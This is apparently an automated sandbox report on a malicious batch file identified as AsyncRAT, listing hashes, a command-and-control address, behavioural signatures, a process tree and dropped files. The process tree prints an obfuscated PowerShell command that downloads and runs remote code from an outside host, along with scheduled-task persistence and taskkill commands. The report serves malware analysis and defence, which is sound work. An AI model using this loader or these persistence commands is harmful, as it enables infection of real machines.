Analysis

Max time kernel: 92s
Max time network: 154s
Platform: windows10-2004_x64
Resource: win10v2004-20220812-en
Resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
Submitted: 11-10-2022 21:41

Tasks
Static task: static1
Behavioral task: behavioral1
Sample: OutPut2.bat
Resource: win7-20220812-en
General

Target: OutPut2.bat
Size: 21KB
MD5: c32b1f1bb8eda7a1e148c1cdf014f23b
SHA1: af0cc28285fc57632751f970ba3040bb1af2faa0
SHA256: 8a0dc53293a9c974b1884f315f724024713523a6cc95e5bb4abee5fdaf79a9b6
SHA512: f7d04d94d7dbabcf7aff4493745660efd65321c2d3e1c2a5c2fea4d02ecbcf90d77e322ef13d257ae263aadbd4cab6a4f237b349b8be0e3e30e3e31f6732980e
SSDEEP: 96:VMzFOMzFJMzFLMzFeMzFzMzFJMzFTMzFiMzFJMzFLMzFUHQeMzFLMzF2MzFqMzFN:OVqYFQqwxqYgQFYNpdiohUPOzfXwQ9j
Malware Config

Extracted family: asyncrat (3LOSH RAT)
Botnet: Default
C2: andojan.ddns.net:6606
Mutex: AsyncMutex_6SI8OkPnk
delay: 3
install: false
install_folder: %AppData%
Signatures

Async RAT payload (2 IoCs)
  resource | yara_rule
  behavioral2/memory/4476-156-0x0000000000400000-0x0000000000414000-memory.dmp | asyncrat
  behavioral2/memory/4476-157-0x000000000040EBAE-mapping.dmp | asyncrat

Blocklisted process makes network request (1 IoC)
  flow | pid | process
  3 | 5040 | powershell.exe

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | WScript.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | WScript.exe

Suspicious use of SetThreadContext (1 IoC)
  description | pid | process | target process
  PID 460 set thread context of 4476 | 460 | powershell.exe | aspnet_compiler.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) (1 TTP, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid | process
  1256 | schtasks.exe
  4792 | schtasks.exe

Kills process with taskkill (3 IoCs)
  pid | process
  3372 | taskkill.exe
  2344 | taskkill.exe
  1732 | taskkill.exe

Modifies registry class (1 IoC)
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings | powershell.exe

Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid | process
  5040 | powershell.exe
  5040 | powershell.exe
  460 | powershell.exe
  460 | powershell.exe

Suspicious use of AdjustPrivilegeToken (6 IoCs)
  description | pid | process
  Token: SeDebugPrivilege | 5040 | powershell.exe
  Token: SeDebugPrivilege | 3372 | taskkill.exe
  Token: SeDebugPrivilege | 2344 | taskkill.exe
  Token: SeDebugPrivilege | 1732 | taskkill.exe
  Token: SeDebugPrivilege | 460 | powershell.exe
  Token: SeDebugPrivilege | 4476 | aspnet_compiler.exe

Suspicious use of WriteProcessMemory (32 IoCs)
  description | pid | process | target process
  PID 3904 wrote to memory of 3016 | 3904 | cmd.exe | cmd.exe
  PID 3904 wrote to memory of 3016 | 3904 | cmd.exe | cmd.exe
  PID 3016 wrote to memory of 5040 | 3016 | cmd.exe | powershell.exe
  PID 3016 wrote to memory of 5040 | 3016 | cmd.exe | powershell.exe
  PID 5040 wrote to memory of 240 | 5040 | powershell.exe | WScript.exe
  PID 5040 wrote to memory of 240 | 5040 | powershell.exe | WScript.exe
  PID 240 wrote to memory of 3400 | 240 | WScript.exe | cmd.exe
  PID 240 wrote to memory of 3400 | 240 | WScript.exe | cmd.exe
  PID 3400 wrote to memory of 1256 | 3400 | cmd.exe | schtasks.exe
  PID 3400 wrote to memory of 1256 | 3400 | cmd.exe | schtasks.exe
  PID 3400 wrote to memory of 4792 | 3400 | cmd.exe | schtasks.exe
  PID 3400 wrote to memory of 4792 | 3400 | cmd.exe | schtasks.exe
  PID 3400 wrote to memory of 3372 | 3400 | cmd.exe | taskkill.exe
  PID 3400 wrote to memory of 3372 | 3400 | cmd.exe | taskkill.exe
  PID 3400 wrote to memory of 2344 | 3400 | cmd.exe | taskkill.exe
  PID 3400 wrote to memory of 2344 | 3400 | cmd.exe | taskkill.exe
  PID 3400 wrote to memory of 1732 | 3400 | cmd.exe | taskkill.exe
  PID 3400 wrote to memory of 1732 | 3400 | cmd.exe | taskkill.exe
  PID 4228 wrote to memory of 4172 | 4228 | WScript.exe | cmd.exe
  PID 4228 wrote to memory of 4172 | 4228 | WScript.exe | cmd.exe
  PID 4172 wrote to memory of 460 | 4172 | cmd.exe | powershell.exe
  PID 4172 wrote to memory of 460 | 4172 | cmd.exe | powershell.exe
  PID 460 wrote to memory of 4476 | 460 | powershell.exe | aspnet_compiler.exe
  PID 460 wrote to memory of 4476 | 460 | powershell.exe | aspnet_compiler.exe
  PID 460 wrote to memory of 4476 | 460 | powershell.exe | aspnet_compiler.exe
  PID 460 wrote to memory of 4476 | 460 | powershell.exe | aspnet_compiler.exe
  PID 460 wrote to memory of 4476 | 460 | powershell.exe | aspnet_compiler.exe
  PID 460 wrote to memory of 4476 | 460 | powershell.exe | aspnet_compiler.exe
  PID 460 wrote to memory of 4476 | 460 | powershell.exe | aspnet_compiler.exe
  PID 460 wrote to memory of 4476 | 460 | powershell.exe | aspnet_compiler.exe
  PID 460 wrote to memory of 4484 | 460 | powershell.exe | schtasks.exe
  PID 460 wrote to memory of 4484 | 460 | powershell.exe | schtasks.exe
Processes

(depth 1) C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\OutPut2.bat"
  - Suspicious use of WriteProcessMemory

  (depth 2) C:\Windows\system32\cmd.exe
    Command line: CMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$8525E0FA70EEBAD1324BD331F92908DB43F4249A64E92444DD63FFB4AC9D79089FD1857C1207D14451056FF87436E6431B1BDAE2D5EB382B35171D284CC0DE3BDE282CE8667D74774D7CCCBE132B3968475695626E186D45FB2B7DE09626E90C92966E81='IEX(NEW-OBJECT NET.W';$6B520D490034728F7709E44F116D159A193300F11DFA9F40EA893256FBF7B8886072CD09D5DCE1EC12CA09EDE71F6DDE384A29B313E4EC1F117CC69B6783D14069D437329F1D3F670DAFC9A76335D8E8B7010C1164601FF8CDD713003C4D245B39DBD450='EBCLIENT).DOWNLO';[BYTE[]];$4BF5260129FD327A8CDD2D9584D51B906D8066007252A3DD3B9A592E686CDF38D807A1305E7148C9BCF7E790A099A6272C6E2ACBA6A24333D289B67E1804C21249292A9C2A8703E87F3849D2033262DE904B3736A214EE10D056E178DFDC34D39279C45E='E01A3094C19277D49A6167D38BD16509408894085F963292E52959632654300649B8544BADBC2231987D9E0EB312E3E48EDE884708209E3843D0367D196268933D92623028FF5219F0CACD1372544251A248A5B35A2FA48806557553780AEC30BCD972F9(''https://pbc.kz/wp-admin/bb.jpg'')'.REPLACE('E01A3094C19277D49A6167D38BD16509408894085F963292E52959632654300649B8544BADBC2231987D9E0EB312E3E48EDE884708209E3843D0367D196268933D92623028FF5219F0CACD1372544251A248A5B35A2FA48806557553780AEC30BCD972F9','ADSTRING');[BYTE[]];IEX($8525E0FA70EEBAD1324BD331F92908DB43F4249A64E92444DD63FFB4AC9D79089FD1857C1207D14451056FF87436E6431B1BDAE2D5EB382B35171D284CC0DE3BDE282CE8667D74774D7CCCBE132B3968475695626E186D45FB2B7DE09626E90C92966E81+$6B520D490034728F7709E44F116D159A193300F11DFA9F40EA893256FBF7B8886072CD09D5DCE1EC12CA09EDE71F6DDE384A29B313E4EC1F117CC69B6783D14069D437329F1D3F670DAFC9A76335D8E8B7010C1164601FF8CDD713003C4D245B39DBD450+$4BF5260129FD327A8CDD2D9584D51B906D8066007252A3DD3B9A592E686CDF38D807A1305E7148C9BCF7E790A099A6272C6E2ACBA6A24333D289B67E1804C21249292A9C2A8703E87F3849D2033262DE904B3736A214EE10D056E178DFDC34D39279C45E)
    - Suspicious use of WriteProcessMemory

    (depth 3) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$8525E0FA70EEBAD1324BD331F92908DB43F4249A64E92444DD63FFB4AC9D79089FD1857C1207D14451056FF87436E6431B1BDAE2D5EB382B35171D284CC0DE3BDE282CE8667D74774D7CCCBE132B3968475695626E186D45FB2B7DE09626E90C92966E81='IEX(NEW-OBJECT NET.W';$6B520D490034728F7709E44F116D159A193300F11DFA9F40EA893256FBF7B8886072CD09D5DCE1EC12CA09EDE71F6DDE384A29B313E4EC1F117CC69B6783D14069D437329F1D3F670DAFC9A76335D8E8B7010C1164601FF8CDD713003C4D245B39DBD450='EBCLIENT).DOWNLO';[BYTE[]];$4BF5260129FD327A8CDD2D9584D51B906D8066007252A3DD3B9A592E686CDF38D807A1305E7148C9BCF7E790A099A6272C6E2ACBA6A24333D289B67E1804C21249292A9C2A8703E87F3849D2033262DE904B3736A214EE10D056E178DFDC34D39279C45E='E01A3094C19277D49A6167D38BD16509408894085F963292E52959632654300649B8544BADBC2231987D9E0EB312E3E48EDE884708209E3843D0367D196268933D92623028FF5219F0CACD1372544251A248A5B35A2FA48806557553780AEC30BCD972F9(''https://pbc.kz/wp-admin/bb.jpg'')'.REPLACE('E01A3094C19277D49A6167D38BD16509408894085F963292E52959632654300649B8544BADBC2231987D9E0EB312E3E48EDE884708209E3843D0367D196268933D92623028FF5219F0CACD1372544251A248A5B35A2FA48806557553780AEC30BCD972F9','ADSTRING');[BYTE[]];IEX($8525E0FA70EEBAD1324BD331F92908DB43F4249A64E92444DD63FFB4AC9D79089FD1857C1207D14451056FF87436E6431B1BDAE2D5EB382B35171D284CC0DE3BDE282CE8667D74774D7CCCBE132B3968475695626E186D45FB2B7DE09626E90C92966E81+$6B520D490034728F7709E44F116D159A193300F11DFA9F40EA893256FBF7B8886072CD09D5DCE1EC12CA09EDE71F6DDE384A29B313E4EC1F117CC69B6783D14069D437329F1D3F670DAFC9A76335D8E8B7010C1164601FF8CDD713003C4D245B39DBD450+$4BF5260129FD327A8CDD2D9584D51B906D8066007252A3DD3B9A592E686CDF38D807A1305E7148C9BCF7E790A099A6272C6E2ACBA6A24333D289B67E1804C21249292A9C2A8703E87F3849D2033262DE904B3736A214EE10D056E178DFDC34D39279C45E)
      - Blocklisted process makes network request
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      (depth 4) C:\Windows\System32\WScript.exe
        Command line: "C:\Windows\System32\WScript.exe" "C:\ProgramData\App\xx.vbs"
        - Checks computer location settings
        - Suspicious use of WriteProcessMemory

        (depth 5) C:\Windows\system32\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\App\xx.bat" "
          - Suspicious use of WriteProcessMemory

          (depth 6) C:\Windows\system32\schtasks.exe
            Command line: schtasks.exe /create /tn App /sc minute /mo 5 /tr "C:\ProgramData\App\cAppc.vbs"
            - Creates scheduled task(s)

          (depth 6) C:\Windows\system32\schtasks.exe
            Command line: schtasks.exe /create /tn det /sc minute /mo 1 /tr "C:\ProgramData\App\cAppc.vbs"
            - Creates scheduled task(s)

          (depth 6) C:\Windows\system32\taskkill.exe
            Command line: taskkill /F /IM schtasks.exe /T
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken

          (depth 6) C:\Windows\system32\taskkill.exe
            Command line: taskkill /F /IM powershell.exe /T
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken

          (depth 6) C:\Windows\system32\taskkill.exe
            Command line: taskkill /F /IM cmd.exe /T
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken

(depth 1) C:\Windows\System32\WScript.exe
  Command line: C:\Windows\System32\WScript.exe "C:\ProgramData\App\cAppc.vbs"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  (depth 2) C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\App\cAppc.bat" "
    - Suspicious use of WriteProcessMemory

    (depth 3) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\App\App.PS1
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      (depth 4) C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        - Suspicious use of AdjustPrivilegeToken

      (depth 4) C:\Windows\system32\schtasks.exe
        Command line: "C:\Windows\system32\schtasks.exe" /delete /tn det /f
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads

C:\ProgramData\App\App.PS1
  Filesize: 264KB
  MD5: b385ec653fef60833ca284dcfff71bff
  SHA1: 612981ecf896a7ef09496894d8059f6a9570cf2a
  SHA256: 76a4b8b505e22defbbd1ba2b577bafe4c4311d2d329f3d29cf3e804a7dd191e8
  SHA512: 00f9155acd9aa8fb82c051fb4a27ee5e5b35229f69e0a20525dbcd85c2bf74025b7cc5608e1680683c4959ebfb4ad90811e006bed63e66acd6f1755005c9ba81

C:\ProgramData\App\cAppc.bat
  Filesize: 81B
  MD5: 6d2d36c3cc7bea993801e5febf7db1c8
  SHA1: 962ca57c247334f79d40e55aa30612c5dfe96c12
  SHA256: 83c47147832482038f4ac9867d5b16ccb78640d9b39d0860805b25db86609a68
  SHA512: 751d5f167617c427697343895988e5b036eff7ee8c358ba35d764378a928b813ee798b5c2e0f67a8dac4622fd5c61708ab0823f9f1498e7d07db4bfe9f466c5d

C:\ProgramData\App\cAppc.vbs
  Filesize: 5KB
  MD5: 5392a92ca835d8812a79a1ee6dac0892
  SHA1: cb56f654f054542c538f492c4d437d65e4f9bba7
  SHA256: 4ab24fc3a3b34b6b7b57d5fbffba6831ed4c7a9c5c31bfd97aeb603d6bd5f2c5
  SHA512: 02175ebd71040d878818dadb2dda855ddc9a43b1dcd625c1943bedc09b3cba48e4debd7b2401025bc992c0ca38dc96e3f2746fe1518808290c2b07132470829d

C:\ProgramData\App\xx.bat
  Filesize: 260B
  MD5: 15b09a88be68cc160232d8766f7e3be7
  SHA1: b3468aaafd099c639405574b719a201b8df00b02
  SHA256: d7128567b26c84039b6fd667ab0d1a443dbbdf15e0550a26e015cbab95979ae2
  SHA512: 0cd81076a2242363bd692b12287ac31e35332b272bd1ded78d9dbd55cee3c8947cce3f45cc4b24bb6c303032d2dfb6efe87edff49fa242b4013e56eaa1cd0460

C:\ProgramData\App\xx.vbs
  Filesize: 4KB
  MD5: 1de9b452f5231a8281209d61a101bcb5
  SHA1: 27ea6c5470a58226b7a1ab8986d3d0bec87ae3eb
  SHA256: 0920a4adad558df5820ab49ab8566d9dbea771da520a754c2652fa5548852f64
  SHA512: e22f70de118f0b6b53e1277ee1c07f30e9d7356db36d858025725b1b0ee2cd677ac926fcb5587243fb342ef7fcff498a68eb6d8ebef3497b5c450468f0d7c4ec

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: 556084f2c6d459c116a69d6fedcc4105
  SHA1: 633e89b9a1e77942d822d14de6708430a3944dbc
  SHA256: 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
  SHA512: 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 9370680d9e75f9273830871b94aff80d
  SHA1: 0af89e92ff564c0bde6e1efa6e4e2d91e6d90fa3
  SHA256: 4300d4dc2ece67f8a9e2c6a70c1b8eedb977c1bdf7a8a5be4e7f7e5afb55d27c
  SHA512: b4b497f9b7b27b018e94fb6ec6ff6143fcb26a298e82d4146b05402354b2345118955fa0f9160aa56102d413a22a58a102d11748491727e1830e06a686e04af1